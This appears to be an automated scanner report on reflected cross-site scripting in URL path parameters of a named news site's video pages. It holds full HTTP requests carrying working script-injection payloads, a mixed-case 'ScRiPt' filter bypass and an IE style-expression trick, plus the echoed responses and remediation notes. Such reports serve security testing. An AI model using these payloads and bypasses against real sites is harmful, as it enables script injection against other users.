GET /video/security/20979809001aab2a'-alert(1)-'3150d050d55 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:30 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:30 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/20979809001aab2a'-alert(1)-'3150d050d55;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=248351618;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff9a"><a%20b%3dc>c1356de54c6 was submitted in the REST URL parameter 3. This input was echoed as bff9a"><a b=c>c1356de54c6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/20979809001bff9a"><a%20b%3dc>c1356de54c6 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30657
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/20979809001bff9a"><a b=c>c1356de54c6;kvarticleid=;kvauthor=;loc=300;grp=425805144" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 453a0</script>f82539d1517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video453a0</script>f82539d1517/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30641
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video453a0</script>f82539d1517/security/21090964001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=363645210;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e638a"><ScRiPt>alert(1)</ScRiPt>e7ef98dc374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /videoe638a"><ScRiPt>alert(1)</ScRiPt>e7ef98dc374/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30771
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/videoe638a"><ScRiPt>alert(1)</ScRiPt>e7ef98dc374/security/;kvarticleid=;kvauthor=;loc=300;grp=5636359" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b758'-alert(1)-'7ead8886ea5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security2b758'-alert(1)-'7ead8886ea5/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:02 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:02 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96682
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security2b758'-alert(1)-'7ead8886ea5/21090964001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=331726376;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d0af"%20a%3db%20286b604eb55 was submitted in the REST URL parameter 3. This input was echoed as 5d0af" a=b 286b604eb55 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/210909640015d0af"%20a%3db%20286b604eb55 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/210909640015d0af" a=b 286b604eb55;kvarticleid=;kvauthor=;loc=300;grp=228968474" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cb55'-alert(1)-'aa5bdd84f43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/210909640018cb55'-alert(1)-'aa5bdd84f43 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/210909640018cb55'-alert(1)-'aa5bdd84f43;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=797050225;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f27cb</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1670a804718 was submitted in the REST URL parameter 1. This input was echoed as f27cb</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1670a804718 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /videof27cb</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1670a804718/security/37740285001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30793
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/videof27cb</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1670a804718/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=641034546;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26018"style%3d"x%3aexpression(alert(1))"f2a6b5d5f24 was submitted in the REST URL parameter 2. This input was echoed as 26018"style="x:expression(alert(1))"f2a6b5d5f24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/security26018"style%3d"x%3aexpression(alert(1))"f2a6b5d5f24/37740285001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:19 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:19 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96545
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <input type="hidden" name="sectionLowerCase" value="security26018"style="x:expression(alert(1))"f2a6b5d5f24"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54b16</ScRiPt%20>711d777804b was submitted in the REST URL parameter 2. This input was echoed as 54b16</ScRiPt >711d777804b in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /video/security54b16</ScRiPt%20>711d777804b/37740285001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:28 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:28 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97271
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security54b16</ScRiPt >711d777804b/37740285001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=257170897;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804f9"%20a%3db%20ac2704b38a4 was submitted in the REST URL parameter 3. This input was echoed as 804f9" a=b ac2704b38a4 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/37740285001804f9"%20a%3db%20ac2704b38a4 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:34 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:34 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/37740285001804f9" a=b ac2704b38a4;kvarticleid=;kvauthor=;loc=300;grp=889498791" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 709c9'-alert(1)-'61eb43f1486 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video709c9'-alert(1)-'61eb43f1486/security/42988833001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30697
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video709c9'-alert(1)-'61eb43f1486/security/42988833001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=328210704;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4a1e'-alert(1)-'655f1d8d90e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/42988833001c4a1e'-alert(1)-'655f1d8d90e HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/42988833001c4a1e'-alert(1)-'655f1d8d90e;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=689735227;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e283"><a>7b71d6d94d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/429888330018e283"><a>7b71d6d94d4 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/429888330018e283"><a>7b71d6d94d4;kvarticleid=;kvauthor=;loc=300;grp=653753543" target="_blank"> ...[SNIP]...
